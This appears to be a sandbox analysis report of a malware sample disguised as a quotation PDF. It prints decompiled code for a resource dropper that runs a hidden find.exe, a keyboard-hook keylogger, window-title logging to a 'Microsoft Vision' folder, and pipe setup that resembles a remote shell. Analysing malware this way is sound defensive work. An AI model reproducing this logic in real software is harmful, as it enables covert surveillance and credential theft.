API ID: Input$DataDevicesMessagePostProcQuitRegisterWindow
String ID: Unknow
API String ID: 292639536-1240069140
Opcode ID: 623fd38af597cdff53a79a309d5820176fdcd7b834e079eb41d14387b95e73bb
Instruction ID: 79d148f2b93f6732b567cd76e98833b5897a1eecb74edba243a74251cf7d48d1
Opcode Fuzzy Hash: 623fd38af597cdff53a79a309d5820176fdcd7b834e079eb41d14387b95e73bb
Instruction Fuzzy Hash: 19F13871A00218EFDB20DFA5DC85BEDBBB4FF04305F5040AAE509A72A1DB749A95DF18

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5D Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 120
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423C5D(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				struct HRSRC__* _v24;
				void* _v28;
				long _v32;
				void* _v36;
				long _v40;
				struct _SHELLEXECUTEINFOA _v100;
				char _v1124;
				char _v2148;
				char _v3172;
				void* _t104;

				_t104 = __eflags;
				_v12 = __ecx;
				_v16 = E004066B9(_a4, 0);
				E00406BFC(_v12 + 4, E00422091(_t104,  &_v20, E004066AB(_a4) + 4, _v16));
				E00406BE2();
				_v28 = LoadResource(0, _v24);
				_v32 = SizeofResource(0, _v24);
				_v36 = LockResource(_v28);
				E0040132F( &_v1124, 0, 0x400);
				E0040132F( &_v2148, 0, 0x400);
				GetTempPathA(0x400,  &_v1124);
				lstrcatA( &_v1124, "find.exe");
				GetTempPathA(0x400,  &_v2148);
				lstrcatA( &_v2148, "find.db");
				_v8 = CreateFileA( &_v1124, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_v8, _v36, _v32,  &_v40, 0);
				CloseHandle(_v8);
				E0040132F( &_v3172, 0, 0x400);
				wsprintfA( &_v3172, "-w %ws -d C -f %s", E00406F44(_v12 + 4),  &_v2148);
				E0040132F( &_v100, 0, 0x3c);
				_v100.cbSize = 0x3c;
				_v100.fMask = 0x40;
				_v100.hwnd = _v100.hwnd & 0x00000000;
				_v100.lpVerb = _v100.lpVerb & 0x00000000;
				_v100.lpFile =  &_v1124;
				_v100.lpParameters =  &_v3172;
				_v100.lpDirectory = _v100.lpDirectory & 0x00000000;
				_v100.nShow = _v100.nShow & 0x00000000;
				_v100.hInstApp = _v100.hInstApp & 0x00000000;
				return ShellExecuteExA( &_v100);
			}

0x00423c5d
0x00423c66
0x00423c73
0x00423c98
0x00423ca0
0x00423cb0
0x00423cbe
0x00423cca
0x00423cdb
0x00423cf1
0x00423d05
0x00423d17
0x00423d29
0x00423d3b
0x00423d60
0x00423d72
0x00423d7b
0x00423d8f
0x00423db6
0x00423dc7
0x00423dcf
0x00423dd6
0x00423ddd
0x00423de1
0x00423deb
0x00423df4
0x00423df7
0x00423dfb
0x00423dff
0x00423e0e

APIs

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

LoadResource.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00423CAA
SizeofResource.KERNEL32(00000000,?,?,?,00000000), ref: 00423CB8
LockResource.KERNEL32(?,?,?,00000000), ref: 00423CC4
GetTempPathA.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,00000000), ref: 00423D05
lstrcatA.KERNEL32(?,find.exe,?,?,?,?,?,?,?,?,00000000), ref: 00423D17
GetTempPathA.KERNEL32(00000400,?,?,?,?,?,?,?,?,?,00000000), ref: 00423D29
lstrcatA.KERNEL32(?,find.db,?,?,?,?,?,?,?,?,00000000), ref: 00423D3B
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423D5A
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00423D72
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00423D7B
wsprintfA.USER32 ref: 00423DB6
ShellExecuteExA.SHELL32(0000003C), ref: 00423E07

Strings

find.exe, xrefs: 00423D0B
@, xrefs: 00423DD6
find.db, xrefs: 00423D2F
-w %ws -d C -f %s, xrefs: 00423DAA
<, xrefs: 00423DCF

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteHandleLoadLockShellSizeofWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
API String ID: 3869627677-265381321
Opcode ID: 881701ab0b6352563db1c3c95245b10340f05ddc7f91dba08e9526acdab547b8
Instruction ID: bc45be3cfb43409ee6cda82784728acd831b5bddd27a6ee99da26301bd32b060
Opcode Fuzzy Hash: 881701ab0b6352563db1c3c95245b10340f05ddc7f91dba08e9526acdab547b8
Instruction Fuzzy Hash: A4414CB1D0021CABEB10EBD0DC4AFEEBB78BB04305F504069E605B6191EB756A55CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00412EF7 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 177
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412EF7(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v8;
				struct HWND__* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				void* _v56;
				DWORD* _v60;
				int _v64;
				void* _v68;
				DWORD* _v72;
				long _v76;
				void* _v80;
				void* _v84;
				DWORD* _v88;
				int _v92;
				void* _v96;
				DWORD* _v100;
				long _v104;
				void* _v108;
				short _v628;
				int _t82;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr _t103;
				intOrPtr _t106;
				intOrPtr _t109;
				intOrPtr _t112;
				intOrPtr _t117;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t126;
				void* _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t147;

				E0040132F( &_v628, 0, 0x208);
				_t2 =  &_v8; // 0x426f44
				E00406F52(_t2);
				_v12 = GetForegroundWindow();
				_t82 = GetWindowTextW(_v12,  &_v628, 0x104);
				_t165 = _t82;
				if(_t82 <= 0) {
					_t16 =  &_v8; // 0x426f44
					E00406A11(_t16, L"{Unknown}");
				} else {
					_t6 =  &_v8; // 0x426f44
					_v20 = E00406C53(_t6, _t165, "{");
					_v16 = E00406F64( &_v28,  &_v628);
					_v24 = E00406CC1(_v20, _v16);
					E00406C53(_v24, _t165, "}");
					E00406BE2();
				}
				_t84 =  *0x42cc9c; // 0x0
				if(lstrlenW(_t84 + 0x210) == 0) {
					_t30 =  &_v8; // 0x426f44
					_v48 = E00406F44(_t30);
					_t88 =  *0x42cc9c; // 0x0
					_v52 = _t88 + 0x210;
					lstrcpyW(_v52, _v48);
					_t91 =  *0x42cc9c; // 0x0
					_t35 = _t91 + 0xa10;
					 *_t35 =  *(_t91 + 0xa10) & 0x00000000;
					__eflags =  *_t35;
				} else {
					_t126 =  *0x42cc9c; // 0x0
					_t128 = E00406F64( &_v32, _t126 + 0x210);
					_t18 =  &_v8; // 0x426f44
					_v36 = E004069E1(_t18, _t128);
					E00406BE2();
					if(_v36 == 0) {
						_t23 =  &_v8; // 0x426f44
						_v40 = E00406F44(_t23);
						_t132 =  *0x42cc9c; // 0x0
						_v44 = _t132 + 0x210;
						lstrcpyW(_v44, _v40);
						_t135 =  *0x42cc9c; // 0x0
						_t28 = _t135 + 0xa10;
						 *_t28 =  *(_t135 + 0xa10) & 0x00000000;
						__eflags =  *_t28;
					} else {
						_t136 =  *0x42cc9c; // 0x0
						 *(_t136 + 0xa10) = 1;
					}
				}
				_t147 =  *0x42cc9c; // 0x0
				_v56 = CreateFileW(E00406F44(_t147 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t94 =  *0x42cc9c; // 0x0
				 *((intOrPtr*)(_t94 + 4)) = _v56;
				_t95 =  *0x42cc9c; // 0x0
				if( *((intOrPtr*)(_t95 + 0xa10)) == 0) {
					_t106 =  *0x42cc9c; // 0x0
					_v60 = _t106 + 8;
					_v64 = lstrlenW(L"\r\n");
					_t109 =  *0x42cc9c; // 0x0
					_v68 =  *((intOrPtr*)(_t109 + 4));
					WriteFile(_v68, L"\r\n", _v64, _v60, 0);
					_t112 =  *0x42cc9c; // 0x0
					_v72 = _t112 + 8;
					_t49 =  &_v8; // 0x426f44
					_v76 = E00406F1B(_t49) << 1;
					_t51 =  &_v8; // 0x426f44
					_v80 = E00406F44(_t51);
					_t117 =  *0x42cc9c; // 0x0
					_v84 =  *((intOrPtr*)(_t117 + 4));
					WriteFile(_v84, _v80, _v76, _v72, 0);
					_t120 =  *0x42cc9c; // 0x0
					_v88 = _t120 + 8;
					_v92 = lstrlenW(L"\r\n");
					_t123 =  *0x42cc9c; // 0x0
					_v96 =  *((intOrPtr*)(_t123 + 4));
					WriteFile(_v96, L"\r\n", _v92, _v88, 0);
				}
				_t96 =  *0x42cc9c; // 0x0
				_v100 = _t96 + 8;
				_v104 = lstrlenW(_a4) << 1;
				_t100 =  *0x42cc9c; // 0x0
				_v108 =  *((intOrPtr*)(_t100 + 4));
				WriteFile(_v108, _a4, _v104, _v100, 0);
				_t103 =  *0x42cc9c; // 0x0
				CloseHandle( *(_t103 + 4));
				return E00406BE2();
			}

0x00412f0e
0x00412f16
0x00412f19
0x00412f24
0x00412f36
0x00412f3c
0x00412f3e
0x00412f8c
0x00412f8f
0x00412f40
0x00412f45
0x00412f4d
0x00412f5f
0x00412f6d
0x00412f78
0x00412f80
0x00412f80
0x00412f94
0x00412fa7
0x00413019
0x00413021
0x00413024
0x0041302e
0x00413037
0x0041303d
0x00413042
0x00413042
0x00413042
0x00412fa9
0x00412fa9
0x00412fb7
0x00412fbd
0x00412fc5
0x00412fcb
0x00412fd4
0x00412fe7
0x00412fef
0x00412ff2
0x00412ffc
0x00413005
0x0041300b
0x00413010
0x00413010
0x00413010
0x00412fd6
0x00412fd6
0x00412fdb
0x00412fdb
0x00413017
0x00413058
0x0041306d
0x00413070
0x00413078
0x0041307b
0x00413087
0x0041308d
0x00413095
0x004130a3
0x004130a6
0x004130ae
0x004130c1
0x004130c7
0x004130cf
0x004130d2
0x004130dc
0x004130df
0x004130e7
0x004130ea
0x004130f2
0x00413103
0x00413109
0x00413111
0x0041311f
0x00413122
0x0041312a
0x0041313d
0x0041313d
0x00413143
0x0041314b
0x00413159
0x0041315c
0x00413164
0x00413175
0x0041317b
0x00413183
0x00413192

APIs

GetForegroundWindow.USER32 ref: 00412F1E
GetWindowTextW.USER32 ref: 00412F36
lstrlenW.KERNEL32(-00000210,{Unknown}), ref: 00412F9F
lstrcpyW.KERNEL32 ref: 00413005
lstrcpyW.KERNEL32 ref: 00413037
CreateFileW.KERNEL32(00000000,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00413067
lstrlenW.KERNEL32(00426E1C), ref: 0041309D
WriteFile.KERNEL32(?,00426E24,?,?,00000000), ref: 004130C1
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00413103
lstrlenW.KERNEL32(00426E2C), ref: 00413119
WriteFile.KERNEL32(?,00426E34,?,?,00000000), ref: 0041313D
lstrlenW.KERNEL32(00412CFB), ref: 00413151

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

WriteFile.KERNEL32(?,00412CFB,?,?,00000000), ref: 00413175
CloseHandle.KERNEL32(?), ref: 00413183

Strings

DoB, xrefs: 00412F16, 00412F8C, 00413019, 00413189, 004130D2, 004130DF, 00412FBD, 00412FE7, 00412F45
{Unknown}, xrefs: 00412F87

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$File$Write$lstrcpy$Window$CloseCreateForegroundHandleText
String ID: DoB${Unknown}
API String ID: 331940522-4155326157
Opcode ID: f97a8379943ac3bf5269522e23789efe737973e4d91c481cc304e2dc88c83d8f
Instruction ID: e08d56ae2a4a713c5634e136b7d5e95b57a94179919973116189c100ffd661c5
Opcode Fuzzy Hash: f97a8379943ac3bf5269522e23789efe737973e4d91c481cc304e2dc88c83d8f
Instruction Fuzzy Hash: A181E874A00208EFDB10DF95DC85BECBBB1FB04304F51807AE90AB72A1DB759A65DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004125A5 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 141
windowstringfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004125A5(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;
				struct _SYSTEMTIME _v44;
				intOrPtr _v48;
				struct tagMSG _v76;
				short _v236;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t94;
				void* _t96;

				_t96 = __eflags;
				_v48 = _a4;
				_v24 = GetModuleHandleA(0);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t35 =  *0x42cc9c; // 0x0
				E0040132F(_t35 + 0x210, 0, 0x800);
				_t38 =  *0x42cc9c; // 0x0
				E0040132F(_t38 + 0x10, 0, 0x208);
				_t41 =  *0x42cc9c; // 0x0
				__imp__SHGetFolderPathW(0, 0, _t41 + 0x10);
				_t43 =  *0x42cc9c; // 0x0
				lstrcatW(_t43 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v44);
				wsprintfW( &_v236, L"%02d-%02d-%02d_%02d.%02d.%02d", _v44.wDay & 0x0000ffff, _v44.wMonth & 0x0000ffff, _v44.wYear & 0x0000ffff, _v44.wHour & 0x0000ffff, _v44.wMinute & 0x0000ffff, _v44.wSecond & 0x0000ffff);
				_t94 = _t91 + 0x38;
				_t56 =  *0x42cc9c; // 0x0
				lstrcatW(_t56 + 0x10,  &_v236);
				_t59 =  *0x42cc9c; // 0x0
				_t81 =  *0x42cc9c; // 0x0
				E00406A11(_t81 + 0xc, _t59 + 0x10);
				_t83 =  *0x42cc9c; // 0x0
				_v12 = CreateFileW(E00406F44(_t83 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t64 =  *0x42cc9c; // 0x0
				 *((intOrPtr*)(_t64 + 4)) = _v12;
				_t65 =  *0x42cc9c; // 0x0
				CloseHandle( *(_t65 + 4));
				_v16 = _v16 & 0x00000000;
				_t68 = E0042211F("c:\\windows\\system32\\user32.dll",  &_v16);
				_t87 = 0;
				_v20 = _t68;
				_t69 = E00420044(_t87, _t96, _v20, 0);
				_t89 = 0x1c;
				_v8 = _t69;
				_t97 = _v8;
				if(_v8 != 0) {
					_t79 = E0041FF80(_t89, _t97, _v8, "SetWindowsHookExA", 0);
					_t94 = _t94 + 0xc;
					 *0x42cc98 = _t79;
				}
				_t70 =  *0x42cc98; // 0x0
				_v28 = _t70;
				_v28(0xd, E00412761, _v24, 0);
				while(GetMessageA( &_v76, 0, 0, 0) > 0) {
					TranslateMessage( &_v76);
					DispatchMessageA( &_v76);
				}
				__eflags = 0;
				return 0;
			}

0x004125a5
0x004125b2
0x004125bd
0x004125c5
0x004125c6
0x004125c7
0x004125c8
0x004125d0
0x004125db
0x004125ea
0x004125f3
0x004125fb
0x0041260c
0x00412617
0x00412620
0x0041262a
0x0041265a
0x00412660
0x0041266a
0x00412673
0x00412679
0x00412682
0x0041268b
0x004126a2
0x004126b7
0x004126ba
0x004126c2
0x004126c5
0x004126cd
0x004126d3
0x004126e0
0x004126e6
0x004126e7
0x004126ef
0x004126f5
0x004126f6
0x004126f9
0x004126fd
0x00412709
0x0041270e
0x00412711
0x00412711
0x00412716
0x0041271b
0x0041272a
0x00412730
0x00412748
0x00412752
0x00412752
0x0041275a
0x0041275e

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004125B7
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 0041260C
lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00412620
GetLocalTime.KERNEL32(?), ref: 0041262A
wsprintfW.USER32 ref: 0041265A
lstrcatW.KERNEL32(-00000010,?), ref: 00412673
CreateFileW.KERNEL32(00000000,10000000,00000001,00000000,00000002,00000080,00000000,-00000010), ref: 004126B1
CloseHandle.KERNEL32(?), ref: 004126CD

Part of subcall function 0042211F: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0042214C
Part of subcall function 0042211F: GetFileSize.KERNEL32(000000FF,00000000), ref: 00422166
Part of subcall function 0042211F: ReadFile.KERNEL32(?,!AB,?,00000000,00000000), ref: 00422186
Part of subcall function 0042211F: FindCloseChangeNotification.KERNEL32(?), ref: 0042219E

Part of subcall function 00420044: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?), ref: 00420071

GetMessageA.USER32 ref: 0041273A
TranslateMessage.USER32(?), ref: 00412748
DispatchMessageA.USER32 ref: 00412752

Part of subcall function 0041FF80: lstrcmpA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0041E2D2,00000000), ref: 0041FFE1

Strings

%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 0041264E
c:\windows\system32\user32.dll, xrefs: 004126DB
\Microsoft Vision\, xrefs: 00412612
SetWindowsHookExA, xrefs: 00412701

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
API String ID: 1641748825-3884914687
Opcode ID: b0e217ccc5e10b0a339a24fbaf0ffc1d26e132d06a21a4c6c8741e3314f43bcb
Instruction ID: 6781548318877eb822be6ed96b7daac604642dfe943857d6688a6d83dce40300
Opcode Fuzzy Hash: b0e217ccc5e10b0a339a24fbaf0ffc1d26e132d06a21a4c6c8741e3314f43bcb
Instruction Fuzzy Hash: CF514471B40204EFEB20DF99EC46FAE77B8EB08704F504426F609F62D1DA74A5558B6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041ADF5 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 83
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041ADF5(intOrPtr __ecx, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				long _v32;
				intOrPtr _v36;

				_v36 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v8 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_v8 != 0) {
					_v12 = OpenServiceW(_v8, E00406F44(_a4), 1);
					if(_v12 != 0) {
						if(QueryServiceConfigW(_v12, 0, 0,  &_v16) != 0) {
							L7:
							_v20 = E0040B86A(_v16);
							if(QueryServiceConfigW(_v12, _v20, _v16,  &_v16) != 0) {
								_v24 = _v20;
								_v28 =  *((intOrPtr*)(_v24 + 4));
								CloseServiceHandle(_v8);
								CloseServiceHandle(_v12);
								E00401014(_v20);
								return _v28;
							}
							CloseServiceHandle(_v8);
							CloseServiceHandle(_v12);
							return 0;
						}
						_v32 = GetLastError();
						if(_v32 == 0x7a) {
							goto L7;
						}
						CloseServiceHandle(_v8);
						CloseServiceHandle(_v12);
						return 0;
					}
					CloseServiceHandle(_v8);
					return 0;
				}
				return 0;
			}

0x0041adfb
0x0041adfe
0x0041ae02
0x0041ae06
0x0041ae0a
0x0041ae0e
0x0041ae12
0x0041ae25
0x0041ae2c
0x0041ae49
0x0041ae50
0x0041ae75
0x0041ae9c
0x0041aea5
0x0041aebd
0x0041aed8
0x0041aee1
0x0041aee7
0x0041aef0
0x0041aef9
0x00000000
0x0041aeff
0x0041aec2
0x0041aecb
0x00000000
0x0041aed1
0x0041ae7d
0x0041ae84
0x00000000
0x00000000
0x0041ae89
0x0041ae92
0x00000000
0x0041ae98
0x0041ae55
0x00000000
0x0041ae5b
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0041AE1F
OpenServiceW.ADVAPI32(00000000,00000000,00000001), ref: 0041AE43
CloseServiceHandle.ADVAPI32(00000000), ref: 0041AE55

Strings

z, xrefs: 0041AE80
ServicesActive, xrefs: 0041AE18

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: OpenService$CloseHandleManager
String ID: ServicesActive$z
API String ID: 4136619037-4112961393
Opcode ID: 6b1bd49b3d49dcd1190fbad2f7904640c8a314c5b17b018067e53fe7928c287d
Instruction ID: b176d935b58ec482da16029bba755de1f8558ac7156ce0f7630d050ce959289b
Opcode Fuzzy Hash: 6b1bd49b3d49dcd1190fbad2f7904640c8a314c5b17b018067e53fe7928c287d
Instruction Fuzzy Hash: 9531C371E00209EFDF11DFA0DD09BAEBBB1BF08316F518465E501B1160D7794A92EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDAC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0041BDC4
socket.WS2_32(00000002,00000001,00000006), ref: 0041BDE0
WSACleanup.WS2_32 ref: 0041BDEF

Strings

127.0.0.1, xrefs: 0041BE00

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CleanupStartupsocket
String ID: 127.0.0.1
API String ID: 3466497225-3619153832
Opcode ID: f0c4676908a5db77a8163053e1b6c0dbfca4568960463268ac87413632b90b44
Instruction ID: 84c9c8ea97403e057b09e5d4500b2afe5757e9f4daa73272df5eb93aeb38149e
Opcode Fuzzy Hash: f0c4676908a5db77a8163053e1b6c0dbfca4568960463268ac87413632b90b44
Instruction Fuzzy Hash: A521FC74E00309EFDB209BB0DC0D6EDBEB4EB08721F914566E912A61A0D7740A829B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1EC Relevance: 19.7, APIs: 13, Instructions: 194
pipeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041D1EC(void* __ecx, void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				int _v88;
				struct _SECURITY_ATTRIBUTES _v100;
				int _t99;
				int _t103;
				int _t109;
				int _t115;
				signed int _t125;
				void* _t136;
				void* _t155;
				void* _t170;

				_v8 = __ecx;
				E0041D147();
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v12 = _v16;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v32 = 1;
				_v100.nLength = 0xc;
				_v100.lpSecurityDescriptor = _v100.lpSecurityDescriptor & 0x00000000;
				_v100.bInheritHandle = 1;
				while(CreatePipe( &_v20,  &_v12,  &_v100, 0) != 0) {
					_v40 = GetCurrentProcess();
					_v44 = _v12;
					_v48 = GetCurrentProcess();
					_t99 = DuplicateHandle(_v48, _v44, _v40,  &_v16, 0, 1, 2);
					__eflags = _t99;
					if(_t99 != 0) {
						_t103 = CreatePipe( &_v28,  &_v24,  &_v100, 0);
						__eflags = _t103;
						if(_t103 != 0) {
							_v52 = GetCurrentProcess();
							_v56 = _v20;
							_v60 = GetCurrentProcess();
							_t109 = DuplicateHandle(_v60, _v56, _v52, _v8 + 8, 0, 0, 2);
							__eflags = _t109;
							if(_t109 != 0) {
								_v64 = GetCurrentProcess();
								_v68 = _v24;
								_v72 = GetCurrentProcess();
								_t115 = DuplicateHandle(_v72, _v68, _v64, _v8 + 0xc, 0, 0, 2);
								__eflags = _t115;
								if(_t115 != 0) {
									E0041D435( &_v20);
									E0041D435( &_v24);
									_pop(_t155);
									_v76 = _v16;
									_v80 = _v28;
									_v84 = _v12;
									E00406FBC(_t170,  &_a4);
									_t125 = E0041CE68(_v8, __eflags, _t155, _v84, _v80, _v76);
									__eflags = _t125;
									if(_t125 != 0) {
										E0041D435( &_v12);
										E0041D435( &_v28);
										E0041D435( &_v16);
										 *((intOrPtr*)(_v8 + 0x10)) = CreateEventA(0, 1, 0, 0);
										 *((intOrPtr*)(_v8 + 0x14)) = CreateThread(0, 0, E0041CF3B, _v8, 0, _v8 + 0x18);
										_t136 = _v8;
										__eflags =  *(_t136 + 0x14);
										if( *(_t136 + 0x14) != 0) {
											_v32 = _v32 & 0x00000000;
											__eflags = 0;
											if(0 != 0) {
												continue;
											}
										} else {
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L16:
					if(_v32 != 0) {
						E0041D435( &_v20);
						E0041D435( &_v12);
						E0041D435( &_v16);
						E0041D435( &_v24);
						E0041D435( &_v28);
						E0041D147();
					}
					if(_v32 != 0) {
						_t83 =  &_v36;
						 *_t83 = _v36 & 0x00000000;
						__eflags =  *_t83;
					} else {
						_v36 = 1;
					}
					_v88 = _v36;
					E00406BE2();
					return _v88;
				}
				goto L16;
			}

0x0041d1f2
0x0041d1f8
0x0041d1fd
0x0041d201
0x0041d208
0x0041d20b
0x0041d20f
0x0041d213
0x0041d21a
0x0041d221
0x0041d225
0x0041d22c
0x0041d24f
0x0041d255
0x0041d25e
0x0041d274
0x0041d27a
0x0041d27c
0x0041d291
0x0041d297
0x0041d299
0x0041d2a6
0x0041d2ac
0x0041d2b5
0x0041d2ce
0x0041d2d4
0x0041d2d6
0x0041d2e3
0x0041d2e9
0x0041d2f2
0x0041d30b
0x0041d311
0x0041d313
0x0041d31e
0x0041d328
0x0041d32d
0x0041d331
0x0041d337
0x0041d33d
0x0041d350
0x0041d358
0x0041d35d
0x0041d35f
0x0041d367
0x0041d371
0x0041d37b
0x0041d392
0x0041d3b3
0x0041d3b6
0x0041d3b9
0x0041d3bd
0x0041d3c1
0x0041d3c5
0x0041d3c7
0x00000000
0x00000000
0x00000000
0x0041d3bf
0x00000000
0x0041d361
0x00000000
0x0041d315
0x00000000
0x0041d2d8
0x00000000
0x0041d29b
0x00000000
0x0041d27e
0x0041d3cd
0x0041d3d1
0x0041d3d7
0x0041d3e1
0x0041d3eb
0x0041d3f5
0x0041d3ff
0x0041d408
0x0041d408
0x0041d411
0x0041d41c
0x0041d41c
0x0041d41c
0x0041d413
0x0041d413
0x0041d413
0x0041d423
0x0041d429
0x0041d432
0x0041d432
0x00000000

APIs

Part of subcall function 0041D147: GetCurrentThreadId.KERNEL32 ref: 0041D157

CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 0041D23A
GetCurrentProcess.KERNEL32 ref: 0041D249
GetCurrentProcess.KERNEL32 ref: 0041D258
DuplicateHandle.KERNEL32(0041D630,00000000,?,00000000,00000000,00000001,00000002), ref: 0041D274

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Current$Process$CreateDuplicateHandlePipeThread
String ID:
API String ID: 2943534975-0
